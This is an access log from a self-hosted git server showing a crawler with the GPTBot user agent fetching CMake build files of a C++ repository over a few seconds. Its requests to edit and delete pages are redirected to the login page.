"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:18:45:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:18:45:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:18:45:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:18:45:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:45:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:18:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:18:45:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:18:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:18:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 30043] [Gzip 7.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:18:45:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10836] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:18:45:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10778] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:18:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11413] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:18:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 12074] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:18:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 12117] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:18:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14376] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:18:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11359] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:18:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11521] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:18:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11501] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:18:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11386] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:18:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:45:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11269] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:45:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11263] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9850] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11259] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11845] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10530] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:45:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10487] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:45:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15389] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:45:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15326] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:45:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10537] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11852] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 995] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:45:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 987] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:45:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9880] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 983] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9875] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9878] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 17130] [Gzip 7.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11871] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10139] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:46:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:46:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:46:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33599] [Gzip 10.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:18:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33906] [Gzip 10.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:18:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33893] [Gzip 10.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:18:46:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 